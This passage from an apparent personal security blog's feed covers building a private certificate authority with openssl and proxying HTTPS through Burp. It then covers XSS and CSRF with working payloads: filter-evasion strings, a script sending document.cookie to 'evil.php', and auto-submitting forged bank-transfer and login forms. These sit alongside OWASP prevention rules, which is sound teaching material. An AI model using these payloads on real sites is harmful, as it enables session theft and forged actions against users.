certificate is of course not trusted by default; once the CA is imported into the local machine's "Trusted Root Certification Authorities" store, certificates it issued are treated as trusted.</p></blockquote><p>2. Issuing certificates from a self-built CA</p><p>Step 1: generate the root CA</p><p>a) Generate the private key ca.key<br><code>openssl genrsa -aes256 -passout pass:123456 -out ca.key 4096</code></p><p>b) Generate the certificate signing request ca.csr<br><code>openssl req -new -key ca.key -out ca.csr -subj "/C=CN/ST=SC/O=CerTest/OU=Test Certificate Authority/CN=Test Root CA"</code></p><blockquote><p>The openssl ca subcommand automatically looks for the openssl.cfg configuration file named in the environment.</p></blockquote><p>c) Self-sign the root certificate with the CA private key<br><code>openssl x509 -req -days 3650 -sha256 -signkey ca.key -in ca.csr -extfile ca.cnf -extensions v3_ca -out ca.cer</code></p><p>ca.cnf configuration file<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[ v3_ca ]</div><div class="line"># Extensions for a typical CA</div><div class="line">subjectKeyIdentifier=hash</div><div class="line">authorityKeyIdentifier=keyid:always,issuer</div><div class="line">basicConstraints = CA:true</div><div class="line">keyUsage = cRLSign, keyCertSign</div></pre></td></tr></table></figure></p><p>Step 2: generate the intermediate certificate</p><p>a) Generate the private key inter.key<br><code>openssl genrsa -aes256 -passout pass:123456 -out inter.key 4096</code></p><p>b) Generate the intermediate certificate request inter.csr<br><code>openssl req -new -key inter.key -out inter.csr -subj "/C=CN/ST=SC/O=CerTest/OU=Test Certificate Authority/CN=Test Intermedia CA"</code></p><p>c) Sign the intermediate certificate inter.cer with the root CA certificate; this certificate can in turn sign server certificates.<br><code>openssl x509 -req -days 3650 -CAkey ca.key -CA ca.cer -in inter.csr -CAcreateserial -extfile inter.cnf -extensions v3_ca -out inter.cer</code></p><p>inter.cnf configuration file<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[ v3_ca ]</div><div class="line"></div><div class="line"># Extensions for a typical CA</div><div class="line">subjectKeyIdentifier=hash</div><div class="line">authorityKeyIdentifier=keyid:always,issuer</div><div class="line"># the intermediate certificate needs pathlen:0</div><div class="line">basicConstraints = CA:true,pathlen:0</div><div class="line">keyUsage = cRLSign, keyCertSign</div></pre></td></tr></table></figure></p><p>Step 3: generate the server certificate request</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">openssl genrsa -aes256 -passout pass:123456 -out server.key 4096</div><div class="line">openssl req -new -key server.key -out server.csr -subj "/O=CerTest/OU=Test Certificate Authority/CN=*.mytestx.com"</div></pre></td></tr></table></figure><p>Step 4: sign the server certificate with the intermediate certificate<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">openssl x509 -req -days 365 -sha256 -CA inter.cer -CAkey inter.key -extfile server.cnf -extensions v3_req -CAcreateserial -in server.csr -out server.cer</div></pre></td></tr></table></figure></p><p>server.cnf configuration file<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">[ v3_req ]</div><div class="line"># Extensions to add to a certificate request</div><div class="line">basicConstraints = CA:FALSE</div><div class="line">keyUsage = nonRepudiation, digitalSignature, keyEncipherment</div><div class="line">nsCertType = server</div><div class="line">subjectAltName = @alt_names</div><div class="line"></div><div class="line">[ alt_names ]</div><div class="line"># fixes the browser error NET::ERR_CERT_COMMON_NAME_INVALID</div><div class="line">DNS.1 = *.mytestx.com</div><div class="line">DNS.2 = mytestx.com</div></pre></td></tr></table></figure></p><blockquote><p>Import ca.cer into the local Trusted Root Certification Authorities store and inter.cer into the Intermediate Certification Authorities store. After ca.cer is imported, inter.cer shows as trusted; only once the intermediate certificate has been imported as well is server.cer trusted by the machine.</p></blockquote><h3 id="OPENSSL-证书验证"><a href="#OPENSSL-证书验证" class="headerlink" title="OPENSSL certificate verification"></a>OPENSSL certificate verification</h3><p>View the certificate<br>openssl s_client -showcerts -connect aa.mytestx.com:443</p><p>Certificate chain verification<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">openssl verify ca.cer</div><div class="line">openssl verify -CAfile ca.cer inter.cer</div><div class="line">cat ca.cer inter.cer > ca_bundle.cer</div><div class="line">openssl verify -CAfile ca_bundle.cer server.cer</div></pre></td></tr></table></figure></p><p>Nginx HTTPS certificate configuration<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">server {</div><div class="line"> listen 443 ssl;</div><div class="line"> server_name aa.mytestx.com;</div><div class="line"> ssl_certificate /demoCA/server.cer;</div><div class="line"> ssl_certificate_key /demoCA/nokey_server.key;</div><div class="line"> ssl_session_cache shared:SSL:1m;</div><div class="line"> ssl_session_timeout 5m;</div><div class="line"> ssl_ciphers HIGH:!aNULL:!MD5;</div><div class="line"> ssl_prefer_server_ciphers on;</div><div class="line"> location / {</div><div class="line"> root /nginx-1.14.0/html;</div><div class="line"> index index.html index.htm;</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p><p>The ssl_certificate parameter can also point at bundle.cer, so that the server sends the intermediate certificate and clients that cannot build the chain on their own still verify it. Order matters when concatenating: the server certificate comes first, the intermediate certificate after it.</p><p>cat server.cer inter.cer > bundle.cer</p><blockquote><p>When a client verifies a server certificate it first checks the certificate's issuer, e.g. the intermediate CA; if that intermediate certificate is not present on the local machine and cannot be downloaded, verification fails with NET::ERR_CERT_AUTHORITY_INVALID. When the intermediate is missing locally or the one the server sends is wrong, a browser will try to fetch it from the URL in the server certificate's "Authority Information Access" extension, but Android clients and API calls do not download it automatically and the connection fails. If the server sends the intermediate certificate, verification succeeds even when only the root CA is present locally. So on some SSL gateway appliances it is best to configure the root CA, the intermediate certificate and the server certificate together.</p></blockquote><h3 id="代理"><a href="#代理" class="headerlink" title="Proxy"></a>Proxy</h3><p>Convert to PKCS12 format for use in Burp<br><code>openssl pkcs12 -export -inkey server.key -in server.crt -out server.pfx</code></p><p><img src="http://i.imgur.com/RdLCQVe.png" alt=""></p><p>If Firefox still does not trust the CA after it has been imported into the Trusted Root Certification Authorities store, edit its trust in the Firefox certificate manager.</p><p><img src="http://i.imgur.com/A3FSl0q.png" alt=""></p><p>Workaround when the Chrome HTTPS proxy keeps failing</p><p>Chrome -> Fiddler -> Burp</p><p>Point the Fiddler Gateway at Burp</p><p>Manual Proxy Configuration:<br><a href="http://127.0.01:8080" target="_blank" rel="external">http://127.0.01:8080</a></p><p>Import and trust the Burp certificate on iOS</p><p><img src="https://i.imgur.com/mmkXp9y.jpg" alt=""></p>]]></content>
<summary type="html">
</summary>
<category term="blog" scheme="http://ruos.org/categories/blog/"/>
<category term="ssl,cer" scheme="http://ruos.org/tags/ssl-cer/"/>
</entry>
<entry>
<title>XSS</title>
<link href="http://ruos.org/2015/04/08/XSS/"/>
<id>http://ruos.org/2015/04/08/XSS/</id>
<published>2015-04-08T14:56:29.000Z</published>
<updated>2017-11-06T01:32:01.222Z</updated>
<content type="html"><![CDATA[<h1 id="Cross-site-Scripting-XSS-跨站脚本"><a href="#Cross-site-Scripting-XSS-跨站脚本" class="headerlink" title="Cross-site Scripting (XSS) 跨站脚本"></a>Cross-site Scripting (XSS) 跨站脚本</h1><p>恶意代码注入</p><h4 id="XSS-using-Script-in-Attributes"><a href="#XSS-using-Script-in-Attributes" class="headerlink" title="XSS using Script in Attributes"></a>XSS using Script in Attributes</h4><p>XSS attacks may be conducted without using <script></script> tags. Other tags will do exactly the same thing, for example:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">body</span> <span class="attr">onload</span>=<span class="string">alert(</span>'<span class="attr">test1</span>')></span></div></pre></td></tr></table></figure></p><p>or other attributes like: onmouseover, onerror.<br>onmouseover<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">b</span> <span class="attr">onmouseover</span>=<span class="string">alert(</span>'<span class="attr">Wufff</span>!')></span>click me!<span class="tag"></<span class="name">b</span>></span></div></pre></td></tr></table></figure></p><p>onerror<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://url.to.file.which/not.exist"</span> <span class="attr">onerror</span>=<span class="string">alert(document.cookie);</span>></span></div></pre></td></tr></table></figure></p><h4 id="XSS-using-Script-Via-Encoded-URI-Schemes"><a href="#XSS-using-Script-Via-Encoded-URI-Schemes" class="headerlink" title="XSS using Script Via Encoded URI Schemes"></a>XSS using Script Via Encoded URI 
Schemes</h4><p>使用编码绕过过滤 如:a=&#X41 (UTF-8)<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">IMG</span> <span class="attr">SRC</span>=<span class="string">j&#X41vascript:alert(</span>'<span class="attr">test2</span>')></span></div></pre></td></tr></table></figure></p><h4 id="XSS-using-code-encoding"><a href="#XSS-using-code-encoding" class="headerlink" title="XSS using code encoding"></a>XSS using code encoding</h4><p>We may encode our script in base64 and place it in META tag.</p><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">META</span> <span class="attr">HTTP-EQUIV</span>=<span class="string">"refresh"</span> <span class="attr">CONTENT</span>=<span class="string">"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"</span>></span></div></pre></td></tr></table></figure><p>伪协议<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="</span>></span>click<span class="tag"></<span class="name">a</span>></span></div></pre></td></tr></table></figure></p><h2 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h2><p>获取用户cookies</p><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">SCRIPT</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="undefined"></span></div><div class="line"><span 
class="javascript"><span class="keyword">var</span> adr = <span class="string">'../evil.php?cakemonster='</span> + <span class="built_in">escape</span>(<span class="built_in">document</span>.cookie);</span></div><div class="line"><span class="undefined"></span><span class="tag"></<span class="name">SCRIPT</span>></span></div></pre></td></tr></table></figure><a id="more"></a><h2 id="存储型"><a href="#存储型" class="headerlink" title="存储型"></a>存储型</h2><p>隐蔽性高</p><h2 id="DOM(Document-Object-Model)-XSS"><a href="#DOM(Document-Object-Model)-XSS" class="headerlink" title="DOM(Document Object Model) XSS"></a>DOM(Document Object Model) XSS</h2><p>动态修改html页面</p><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">body</span>></span></div><div class="line"><span class="tag"><<span class="name">script</span>></span><span class="undefined"></span></div><div class="line"><span class="javascript"><span class="built_in">document</span>.write(<span class="built_in">document</span>.location.href.substring(<span class="built_in">document</span>.location.href.indexOf(<span class="string">"default="</span>)+<span class="number">8</span>));</span></div><div class="line"><span class="undefined"></span><span class="tag"></<span class="name">script</span>></span></div><div class="line"><span class="tag"></<span class="name">body</span>></span></div></pre></td></tr></table></figure><p>The malicious script can be embedded in the URL as follows in two ways:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">http://www.some.site/page.html?default=<script>alert(document.cookie)</script></div><div class="line">or </div><div 
class="line">http://www.some.site/page.html#default=<script>alert(document.cookie)</script></div></pre></td></tr></table></figure><p>浏览器防护(自动URL编码)<br>%3Cscript%3Ealert(document.cookie)%3C/script%3E</p><h3 id="XSS-Ajax提交表单getshell"><a href="#XSS-Ajax提交表单getshell" class="headerlink" title="XSS Ajax提交表单getshell"></a>XSS Ajax提交表单getshell</h3><h2 id="XSS-Cross-Site-Scripting-Prevention-Cheat-Sheet"><a href="#XSS-Cross-Site-Scripting-Prevention-Cheat-Sheet" class="headerlink" title="XSS (Cross Site Scripting) Prevention Cheat Sheet"></a>XSS (Cross Site Scripting) Prevention Cheat Sheet</h2><p><a href="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" target="_blank" rel="external">https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a></p><ol><li>仔细验证不可信数据</li><li>HTML实体编码 You MUST use the escape syntax for the part of the HTML document you’re putting untrusted data into.</li></ol><h4 id="XSS-Prevention-Rules"><a href="#XSS-Prevention-Rules" class="headerlink" title="XSS Prevention Rules"></a>XSS Prevention Rules</h4><p>RULE #0 don’t put untrusted data into your HTML document<br>RULE #1 HTML Escape<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">& --> &amp;</div><div class="line">< --> &lt;</div><div class="line">> --> &gt;</div><div class="line">" --> &quot;</div><div class="line">' --> &#x27; &apos; is in the XML and XHTML specs.</div><div class="line">/ --> &#x2F; forward slash is included as it helps end an HTML entity</div></pre></td></tr></table></figure></p><p>RULE #2 - Attribute Escape<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">input</span> 
<span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"fname"</span> <span class="attr">value</span>=<span class="string">"UNTRUSTED DATA"</span>></span></div></pre></td></tr></table></figure></p><p>RULE #3 - JavaScript Escape<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><script>var currentValue='UNTRUSTED DATA';</script></div><div class="line"><script>someFunction('UNTRUSTED DATA');</script> </div><div class="line"></div><div class="line">//编码</div><div class="line"><SCRIPT>alert("XSS")</SCRIPT> </div><div class="line">&lt;SCRIPT&gt;alert&#x28;&quot;XSS&quot;&#x29;&lt;&#x2f;SCRIPT&gt;</div></pre></td></tr></table></figure></p><ul><li>Ensure JavaScript variables are quoted</li><li>JavaScript Hex Encoding</li><li>JavaScript Unicode Encoding</li><li>Avoid backslash encoding (\” or \’ or \)</li></ul><p>RULE #4 - CSS Escape And Strictly Validate<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">"width: UNTRUSTED DATA;"</span>></span>Selection<span class="tag"></<span class="name">div</span>></span></div></pre></td></tr></table></figure></p><ul><li>CSS Hex encoding</li></ul><p>Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the \HH escaping format.<br>RULE #5 - URL Escape<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><a href=<span class="string">"/site/search?value=<?php echo urlencode($_GET['url']) 
?>"</span>>clickme</a></div></pre></td></tr></table></figure></p><p>RULE #6 - Sanitize HTML Markup<br>PHP Html Purifier - <a href="http://htmlpurifier.org/" target="_blank" rel="external">http://htmlpurifier.org/</a><br>RULE #7 - Prevent DOM-based XSS</p><p>Others<br>Use HTTPOnly cookie flag</p><h2 id="XSS-Filter-Evasion"><a href="#XSS-Filter-Evasion" class="headerlink" title="XSS Filter Evasion"></a>XSS Filter Evasion</h2><p><a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" target="_blank" rel="external">https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a></p><ul><li>XSS Platform</li><li>XSS 编码</li><li>OWASP XSSER</li></ul><ol><li>编码</li></ol><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">URL编码 空格(%20)</div><div class="line">HTML实体编码 < (&lt;)</div><div class="line">字符编码 十进制、十六进制ASCII码或unicode字符编码 < (&#60;) >(&#62;)</div><div class="line">Js编码 < (u003c) >(u003e)</div><div class="line">CSS编码 \65</div></pre></td></tr></table></figure><p>HTML实体编码</p><table border="0" cellspacing="0" cellpadding="0"><br><tbody><br> <tr><br> <th style="width:20%">显示结果</th><br> <th style="width:20%">描述</th><br> <th style="width:30%">实体名称</th><br> <th style="width:30%">实体编号</th><br> </tr><br> <tr><br> <td> </td><br> <td>空格</td><br> <td>&nbsp;</td><br> <td>&#160;</td><br> </tr><br> <tr><br> <td><</td><br> <td>小于号</td><br> <td>&lt;</td><br> <td>&#60;</td><br> </tr><br> <tr><br> <td>></td><br> <td>大于号</td><br> <td>&gt;</td><br> <td>&#62;</td><br> </tr><br> <tr><br> <td>&</td><br> <td>和号</td><br> <td>&amp;</td><br> <td>&#38;</td><br> </tr><br> <tr><br> <td>“</td><br> <td>引号</td><br> <td>&quot;</td><br> <td>&#34;</td><br> </tr><br> <tr><br> <td>‘</td><br> <td>撇号 </td><br> <td>&apos; (IE不支持)</td><br> <td>&#39;</td><br> 
</tr><br></tbody><br></table><p>Unicode编码<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"javascript:alert(/xss/)"</span>></span>click<span class="tag"></<span class="name">a</span>></span></div><div class="line"><span class="tag"><<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#120;&#115;&#115;&#47;&#41;"</span>></span>click<span class="tag"></<span class="name">a</span>></span></div></pre></td></tr></table></figure></p><ol><li>单引号</li></ol><p><code><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code></p><ol><li>其他</li></ol><p>使用tab键空开<br><code><IMG SRC="jav ascript:alert('XSS');"></code></p><p>编码tab<br><code><IMG SRC="jav&#x09;ascript:alert('XSS');"></code></p><p>使用制表符, 换行符和回车符</p><blockquote><p>加入新行; Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. 
</p></blockquote><p><code><IMG SRC="jav&#x0A;ascript:alert('XSS');"></code></p><table border="0" cellspacing="0" cellpadding="0"><br><tbody><br><tr><br><td>Type</td><br><td>Horizontal Tab</td><br><td>New line</td><br><td>Carriage Return</td><br></tr><br><tr><br><td>URL</td><br><td>%09</td><br><td>%10</td><br><td>%13</td><br></tr><br><tr><br><td>Minimal Sized Hex</td><br><td>&#x9</td><br><td>&#xA</td><br><td>&#xD</td><br></tr><br><tr><br><td>Maximum Sized Hex</td><br><td>&#x0000009;</td><br><td>&#x000000A;</td><br><td>&#x000000D;</td><br></tr><br><tr><br><td>Minimum Sized Decimal</td><br><td>&#9</td><br><td>&#10</td><br><td>&#13</td><br></tr><br><tr><br><td>Maximum Sized Decimal</td><br><td>&#x0000009;</td><br><td>&#x0000009;</td><br><td>&#0000009;</td><br></tr><br></tbody><br></table><h1 id="Cross-Site-Request-Forgery-CSRF-跨站脚本请求伪造"><a href="#Cross-Site-Request-Forgery-CSRF-跨站脚本请求伪造" class="headerlink" title="Cross-Site Request Forgery (CSRF) 跨站脚本请求伪造"></a>Cross-Site Request Forgery (CSRF) 跨站脚本请求伪造</h1><p>向服务器提交数据</p><p><img src="https://www.owasp.org//images/f/f3/Session_riding.GIF" alt=""></p><p>在a.com中访问b.com(或者受害者通过邮件点击访问example.com/delete?rule=*),<strong>某些浏览器将自动发送其cookie</strong>。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">"http://b.com/test.php"</span>></span><span class="tag"></<span class="name">iframe</span>></span></div></pre></td></tr></table></figure></p><ul><li>自动删除文章</li><li>自动添加管理员账号</li></ul><p>GET scenario<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://bank.com/transfer.do?acct=MARIA&amount=100000"</span> <span class="attr">width</span>=<span 
class="string">"0"</span> <span class="attr">height</span>=<span class="string">"0"</span> <span class="attr">border</span>=<span class="string">"0"</span>></span></div></pre></td></tr></table></figure></p><p>POST scenario<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="comment"><!-- csrftest.html --></span></div><div class="line"><span class="tag"><<span class="name">html</span>></span></div><div class="line"><span class="tag"><<span class="name">body</span> <span class="attr">onload</span>=<span class="string">'document.CSRF.submit()'</span>></span></div><div class="line"><span class="comment"><!-- if the form contains a field with name='submit', it conflicts with form.submit() --></span></div><div class="line"><span class="tag"><<span class="name">form</span> <span class="attr">action</span>=<span class="string">'http://tagetWebsite/Authenticate.jsp'</span> <span class="attr">method</span>=<span class="string">'POST'</span> <span class="attr">name</span>=<span class="string">'CSRF'</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">'hidden'</span> <span class="attr">name</span>=<span class="string">'name'</span> <span class="attr">value</span>=<span class="string">'Hacked'</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">'hidden'</span> <span class="attr">name</span>=<span class="string">'password'</span> <span class="attr">value</span>=<span class="string">'Hacked'</span>></span></div><div class="line"><span class="tag"></<span class="name">form</span>></span></div><div 
class="line"></div><div class="line"><span class="tag"></<span class="name">body</span>></span></div><div class="line"><span class="tag"></<span class="name">html</span>></span></div></pre></td></tr></table></figure></p><p>Combined with an XSS vulnerability, the attack is completely silent.</p><h4 id="Prevent-CSRF-Vulnerabilities"><a href="#Prevent-CSRF-Vulnerabilities" class="headerlink" title="Prevent CSRF Vulnerabilities"></a>Prevent CSRF Vulnerabilities</h4><ol><li><p>Check standard headers to verify the request is same origin </p><ul><li>Origin Header </li><li>Referer Header (the Referer can be bypassed)</li></ul></li><li><p>AND Check CSRF token </p></li></ol><h4 id="same-origin-policy"><a href="#same-origin-policy" class="headerlink" title="same-origin policy"></a>same-origin policy</h4><blockquote><p>Same-origin policy: same protocol, domain and port; cross-origin access is not allowed.</p></blockquote><p><img src="http://i.imgur.com/dswMO29.png" alt=""></p><p>How is cross-origin access achieved?</p><p>1. Access-Control-Allow-Origin header</p><p>a.com allows other origins to access its resources<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span> header(<span class="string">"Access-Control-Allow-Origin: *"</span>); <span class="meta">?></span></div></pre></td></tr></table></figure></p><p>b.com<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">$.get(<span class="string">"http://a.com/test.php"</span>, <span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</div><div class="line">alert(data);</div><div class="line">});</div></pre></td></tr></table></figure></p><p>2. 
getJSON<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">$.getJSON(<span class="string">"http://www.runoob.com/try/ajax/jsonp.php?jsoncallback=?"</span>, <span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</div><div class="line"><span class="comment">// code that handles the returned JSON</span></div><div class="line">});</div></pre></td></tr></table></figure></p><p>3. iframe</p><h4 id="跨域策略文件"><a href="#跨域策略文件" class="headerlink" title="跨域策略文件"></a>Cross-domain policy file</h4><p>crossdomain.xml</p>]]></content>
<summary type="html">
<h1 id="Cross-site-Scripting-XSS-跨站脚本"><a href="#Cross-site-Scripting-XSS-跨站脚本" class="headerlink" title="Cross-site Scripting (XSS) 跨站脚本"></a>Cross-site Scripting (XSS)</h1><p>Malicious code injection</p>
<h4 id="XSS-using-Script-in-Attributes"><a href="#XSS-using-Script-in-Attributes" class="headerlink" title="XSS using Script in Attributes"></a>XSS using Script in Attributes</h4><p>XSS attacks may be conducted without using <script></script> tags. Other tags will do exactly the same thing, for example:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">alert(</span>'<span class="attr">test1</span>')&gt;</span></div></pre></td></tr></table></figure></p>
<p>or other attributes like: onmouseover, onerror.<br>onmouseover<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">b</span> <span class="attr">onmouseover</span>=<span class="string">alert(</span>'<span class="attr">Wufff</span>!')&gt;</span>click me!<span class="tag">&lt;/<span class="name">b</span>&gt;</span></div></pre></td></tr></table></figure></p>
<p>onerror<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://url.to.file.which/not.exist"</span> <span class="attr">onerror</span>=<span class="string">alert(document.cookie);</span>&gt;</span></div></pre></td></tr></table></figure></p>
<h4 id="XSS-using-Script-Via-Encoded-URI-Schemes"><a href="#XSS-using-Script-Via-Encoded-URI-Schemes" class="headerlink" title="XSS using Script Via Encoded URI Schemes"></a>XSS using Script Via Encoded URI Schemes</h4><p>Using encoding to bypass filters, e.g. a=&amp;#X41 (UTF-8)<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">IMG</span> <span class="attr">SRC</span>=<span class="string">j&amp;#X41vascript:alert(</span>'<span class="attr">test2</span>')&gt;</span></div></pre></td></tr></table></figure></p>
<h4 id="XSS-using-code-encoding"><a href="#XSS-using-code-encoding" class="headerlink" title="XSS using code encoding"></a>XSS using code encoding</h4><p>We may encode our script in base64 and place it in META tag.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">META</span> <span class="attr">HTTP-EQUIV</span>=<span class="string">"refresh"</span> <span class="attr">CONTENT</span>=<span class="string">"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"</span>&gt;</span></div></pre></td></tr></table></figure>
<p>Pseudo-protocol<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="</span>&gt;</span>click<span class="tag">&lt;/<span class="name">a</span>&gt;</span></div></pre></td></tr></table></figure></p>
<h2 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>Reflected XSS</h2><p>Obtaining the user's cookies</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">SCRIPT</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>&gt;</span><span class="undefined"></span></div><div class="line"><span class="javascript"><span class="keyword">var</span> adr = <span class="string">'../evil.php?cakemonster='</span> + <span class="built_in">escape</span>(<span class="built_in">document</span>.cookie);</span></div><div class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">SCRIPT</span>&gt;</span></div></pre></td></tr></table></figure>
</summary>
</entry>
</feed>